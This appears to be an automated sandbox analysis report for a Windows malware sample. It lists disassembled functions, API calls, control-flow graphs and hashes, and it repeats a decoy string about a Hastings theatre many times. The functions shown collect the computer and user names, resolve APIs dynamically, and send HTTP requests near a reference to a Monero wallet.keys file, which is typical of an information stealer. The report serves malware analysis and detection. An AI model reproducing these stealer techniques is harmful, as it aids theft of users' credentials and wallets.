                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00944638
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0094473F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0094474F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00944662
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00944734
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00944657
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009446AC
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009445F3
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009446CD
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00944643
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0094466D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009445E8
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0094477B
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00944713
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0094471E
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00944622
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00944683
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00944617
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00944729
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeapProtectVirtual
                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                    • API String ID: 1542196881-2218711628
                                    • Opcode ID: d94d1ea50ff358b39bed7fe205818cf9b568dd72735541bd2bddcf4d7790b13b
                                    • Instruction ID: 3018641ed45a46739967c185f06b31ff59d9f7598d642dd1c2e9b991cfc2843d
                                    • Opcode Fuzzy Hash: d94d1ea50ff358b39bed7fe205818cf9b568dd72735541bd2bddcf4d7790b13b
                                    • Instruction Fuzzy Hash: C041F7A17C760C7AC63EBBA6885EEDD76767FC2708F51504AAC4852282CEB06901CF61
                                    Function 00944880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 801 944880-944942 call 95a7a0 call 9447b0 call 95a740 * 5 InternetOpenA StrCmpCA 816 944944 801->816 817 94494b-94494f 801->817 816->817 818 944955-944acd call 958b60 call 95a920 call 95a8a0 call 95a800 * 2 call 95a9b0 call 95a8a0 call 95a800 call 95a9b0 call 95a8a0 call 95a800 call 95a920 call 95a8a0 call 95a800 call 95a9b0 call 95a8a0 call 95a800 call 95a9b0 call 95a8a0 call 95a800 call 95a9b0 call 95a920 call 95a8a0 call 95a800 * 2 InternetConnectA 817->818 819 944ecb-944ef3 InternetCloseHandle call 95aad0 call 949ac0 817->819 818->819 905 944ad3-944ad7 818->905 829 944ef5-944f2d call 95a820 call 95a9b0 call 95a8a0 call 95a800 819->829 830 944f32-944fa2 call 958990 * 2 call 95a7a0 call 95a800 * 8 819->830 829->830 906 944ae5 905->906 907 944ad9-944ae3 905->907 908 944aef-944b22 HttpOpenRequestA 906->908 907->908 909 944ebe-944ec5 InternetCloseHandle 908->909 910 944b28-944e28 call 95a9b0 call 95a8a0 call 95a800 call 95a920 call 95a8a0 call 95a800 call 95a9b0 call 95a8a0 call 95a800 call 95a9b0 call 95a8a0 call 95a800 call 95a9b0 call 95a8a0 call 95a800 call 95a9b0 call 95a8a0 call 95a800 call 95a920 call 95a8a0 call 95a800 call 95a9b0 call 95a8a0 call 95a800 call 95a9b0 call 95a8a0 call 95a800 call 95a920 call 95a8a0 call 95a800 call 95a9b0 call 95a8a0 call 95a800 call 95a9b0 call 95a8a0 call 95a800 call 95a9b0 call 95a8a0 call 95a800 call 95a9b0 call 95a8a0 call 95a800 call 95a920 call 95a8a0 call 95a800 call 95a740 call 95a920 * 2 call 95a8a0 call 95a800 * 2 call 95aad0 lstrlen call 95aad0 * 2 lstrlen call 95aad0 HttpSendRequestA 908->910 909->819 1021 944e32-944e5c InternetReadFile 910->1021 1022 944e67-944eb9 InternetCloseHandle call 95a800 1021->1022 1023 944e5e-944e65 1021->1023 1022->909 1023->1022 1024 944e69-944ea7 call 95a9b0 call 95a8a0 call 95a800 1023->1024 1024->1021
                                    APIs
                                      • Part of subcall function 0095A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0095A7E6
                                      • Part of subcall function 009447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00944839
                                      • Part of subcall function 009447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00944849
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00944915
                                    • StrCmpCA.SHLWAPI(?,015EE590), ref: 0094493A
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00944ABA
                                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00960DDB,00000000,?,?,00000000,?,",00000000,?,015EE4D0), ref: 00944DE8
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00944E04
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00944E18
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00944E49
                                    • InternetCloseHandle.WININET(00000000), ref: 00944EAD
                                    • InternetCloseHandle.WININET(00000000), ref: 00944EC5
                                    • HttpOpenRequestA.WININET(00000000,015EE450,?,015ED9E8,00000000,00000000,00400100,00000000), ref: 00944B15
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                      • Part of subcall function 0095A920: lstrcpy.KERNEL32(00000000,?), ref: 0095A972
                                      • Part of subcall function 0095A920: lstrcat.KERNEL32(00000000), ref: 0095A982
                                    • InternetCloseHandle.WININET(00000000), ref: 00944ECF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 460715078-2180234286
                                    • Opcode ID: 2188c472c6a0800d98f088198b39f5957b8d951c42f27d0b27b7cd7707e9049b
                                    • Instruction ID: 7f0bc8720427f376c36ccf9b818fea1e67adb35e90d0ec864da97f06759b0aa2
                                    • Opcode Fuzzy Hash: 2188c472c6a0800d98f088198b39f5957b8d951c42f27d0b27b7cd7707e9049b
                                    • Instruction Fuzzy Hash: 9F12CC71910118AADB15EB91DCA2FEEB778BF94301F504299B60663091EF702F4DCF6A
                                    Function 009578E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00957910
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00957917
                                    • GetComputerNameA.KERNEL32(?,00000104), ref: 0095792F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateComputerNameProcess
                                    • String ID:
                                    • API String ID: 1664310425-0
                                    • Opcode ID: 04809f690976a6db23de034b432f7ec429e9aa61712481fcf4cc50342e270fbc
                                    • Instruction ID: eca10b5dc56846369b0b1b7671aefa477497f0fe6c0102201802226d29876616
                                    • Opcode Fuzzy Hash: 04809f690976a6db23de034b432f7ec429e9aa61712481fcf4cc50342e270fbc
                                    • Instruction Fuzzy Hash: 7C0162B1904204EBD710DF95DD45FAAFBB8F744B51F10421AEA45A3290D77459048BA1
                                    Function 00957850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009411B7), ref: 00957880
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00957887
                                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0095789F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateNameProcessUser
                                    • String ID:
                                    • API String ID: 1296208442-0
                                    • Opcode ID: 7f571a84b06e51c19e3b94301dbd2ce26388f64960f4a4ff0bf3c01556d6bc79
                                    • Instruction ID: b44e4795334006abaa2faa4e972489d3cff8c2a8a09a6f5152677f9ea1ee90d5
                                    • Opcode Fuzzy Hash: 7f571a84b06e51c19e3b94301dbd2ce26388f64960f4a4ff0bf3c01556d6bc79
                                    • Instruction Fuzzy Hash: 9EF04FB1944208ABD710DF99DD49BAEFBB8EB04711F10065AFA05A3690C7785904CBA1
                                    Function 00941160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitInfoProcessSystem
                                    • String ID:
                                    • API String ID: 752954902-0
                                    • Opcode ID: 79a151d0de94ed92838c61edb3dcb89fb5e2821e87872da502bb666854a0f305
                                    • Instruction ID: aaccfff22c23759bdd7f9170c62c9500c626dc4e103d2976bbee8adb6f15240e
                                    • Opcode Fuzzy Hash: 79a151d0de94ed92838c61edb3dcb89fb5e2821e87872da502bb666854a0f305
                                    • Instruction Fuzzy Hash: 3AD05E7890430CDBDB00DFE0D849ADDBB78FB0C311F000556D90563350EE306881CBA6
                                    Function 00959C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 633 959c10-959c1a 634 95a036-95a0ca LoadLibraryA * 8 633->634 635 959c20-95a031 GetProcAddress * 43 633->635 636 95a146-95a14d 634->636 637 95a0cc-95a141 GetProcAddress * 5 634->637 635->634 638 95a216-95a21d 636->638 639 95a153-95a211 GetProcAddress * 8 636->639 637->636 640 95a21f-95a293 GetProcAddress * 5 638->640 641 95a298-95a29f 638->641 639->638 640->641 642 95a2a5-95a332 GetProcAddress * 6 641->642 643 95a337-95a33e 641->643 642->643 644 95a344-95a41a GetProcAddress * 9 643->644 645 95a41f-95a426 643->645 644->645 646 95a4a2-95a4a9 645->646 647 95a428-95a49d GetProcAddress * 5 645->647 648 95a4dc-95a4e3 646->648 649 95a4ab-95a4d7 GetProcAddress * 2 646->649 647->646 650 95a515-95a51c 648->650 651 95a4e5-95a510 GetProcAddress * 2 648->651 649->648 652 95a612-95a619 650->652 653 95a522-95a60d GetProcAddress * 10 650->653 651->650 654 95a67d-95a684 652->654 655 95a61b-95a678 GetProcAddress * 4 652->655 653->652 656 95a686-95a699 GetProcAddress 654->656 657 95a69e-95a6a5 654->657 655->654 656->657 658 95a6a7-95a703 GetProcAddress * 4 657->658 659 95a708-95a709 657->659 658->659
                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,015D62E0), ref: 00959C2D
                                    • GetProcAddress.KERNEL32(75900000,015D6540), ref: 00959C45
                                    • GetProcAddress.KERNEL32(75900000,015E8F10), ref: 00959C5E
                                    • GetProcAddress.KERNEL32(75900000,015E8FB8), ref: 00959C76
                                    • GetProcAddress.KERNEL32(75900000,015EC8D0), ref: 00959C8E
                                    • GetProcAddress.KERNEL32(75900000,015ECA20), ref: 00959CA7
                                    • GetProcAddress.KERNEL32(75900000,015DB130), ref: 00959CBF
                                    • GetProcAddress.KERNEL32(75900000,015ECA38), ref: 00959CD7
                                    • GetProcAddress.KERNEL32(75900000,015ECA50), ref: 00959CF0
                                    • GetProcAddress.KERNEL32(75900000,015ECAE0), ref: 00959D08
                                    • GetProcAddress.KERNEL32(75900000,015EC840), ref: 00959D20
                                    • GetProcAddress.KERNEL32(75900000,015D6280), ref: 00959D39
                                    • GetProcAddress.KERNEL32(75900000,015D65A0), ref: 00959D51
                                    • GetProcAddress.KERNEL32(75900000,015D62A0), ref: 00959D69
                                    • GetProcAddress.KERNEL32(75900000,015D6620), ref: 00959D82
                                    • GetProcAddress.KERNEL32(75900000,015EC8A0), ref: 00959D9A
                                    • GetProcAddress.KERNEL32(75900000,015ECA68), ref: 00959DB2
                                    • GetProcAddress.KERNEL32(75900000,015DAF00), ref: 00959DCB
                                    • GetProcAddress.KERNEL32(75900000,015D63A0), ref: 00959DE3
                                    • GetProcAddress.KERNEL32(75900000,015EC810), ref: 00959DFB
                                    • GetProcAddress.KERNEL32(75900000,015EC918), ref: 00959E14
                                    • GetProcAddress.KERNEL32(75900000,015ECA80), ref: 00959E2C
                                    • GetProcAddress.KERNEL32(75900000,015EC870), ref: 00959E44
                                    • GetProcAddress.KERNEL32(75900000,015D65E0), ref: 00959E5D
                                    • GetProcAddress.KERNEL32(75900000,015EC9C0), ref: 00959E75
                                    • GetProcAddress.KERNEL32(75900000,015ECA98), ref: 00959E8D
                                    • GetProcAddress.KERNEL32(75900000,015ECAB0), ref: 00959EA6
                                    • GetProcAddress.KERNEL32(75900000,015ECAC8), ref: 00959EBE
                                    • GetProcAddress.KERNEL32(75900000,015EC858), ref: 00959ED6
                                    • GetProcAddress.KERNEL32(75900000,015EC9D8), ref: 00959EEF
                                    • GetProcAddress.KERNEL32(75900000,015ECAF8), ref: 00959F07
                                    • GetProcAddress.KERNEL32(75900000,015EC8E8), ref: 00959F1F
                                    • GetProcAddress.KERNEL32(75900000,015EC9F0), ref: 00959F38
                                    • GetProcAddress.KERNEL32(75900000,015E9AB8), ref: 00959F50
                                    • GetProcAddress.KERNEL32(75900000,015EC930), ref: 00959F68
                                    • GetProcAddress.KERNEL32(75900000,015EC828), ref: 00959F81
                                    • GetProcAddress.KERNEL32(75900000,015D6420), ref: 00959F99
                                    • GetProcAddress.KERNEL32(75900000,015ECA08), ref: 00959FB1
                                    • GetProcAddress.KERNEL32(75900000,015D6580), ref: 00959FCA
                                    • GetProcAddress.KERNEL32(75900000,015EC888), ref: 00959FE2
                                    • GetProcAddress.KERNEL32(75900000,015EC8B8), ref: 00959FFA
                                    • GetProcAddress.KERNEL32(75900000,015D65C0), ref: 0095A013
                                    • GetProcAddress.KERNEL32(75900000,015D6600), ref: 0095A02B
                                    • LoadLibraryA.KERNEL32(015EC948,?,00955CA3,00960AEB,?,?,?,?,?,?,?,?,?,?,00960AEA,00960AE3), ref: 0095A03D
                                    • LoadLibraryA.KERNEL32(015EC900,?,00955CA3,00960AEB,?,?,?,?,?,?,?,?,?,?,00960AEA,00960AE3), ref: 0095A04E
                                    • LoadLibraryA.KERNEL32(015EC978,?,00955CA3,00960AEB,?,?,?,?,?,?,?,?,?,?,00960AEA,00960AE3), ref: 0095A060
                                    • LoadLibraryA.KERNEL32(015EC960,?,00955CA3,00960AEB,?,?,?,?,?,?,?,?,?,?,00960AEA,00960AE3), ref: 0095A072
                                    • LoadLibraryA.KERNEL32(015EC990,?,00955CA3,00960AEB,?,?,?,?,?,?,?,?,?,?,00960AEA,00960AE3), ref: 0095A083
                                    • LoadLibraryA.KERNEL32(015EC9A8,?,00955CA3,00960AEB,?,?,?,?,?,?,?,?,?,?,00960AEA,00960AE3), ref: 0095A095
                                    • LoadLibraryA.KERNEL32(015ECC48,?,00955CA3,00960AEB,?,?,?,?,?,?,?,?,?,?,00960AEA,00960AE3), ref: 0095A0A7
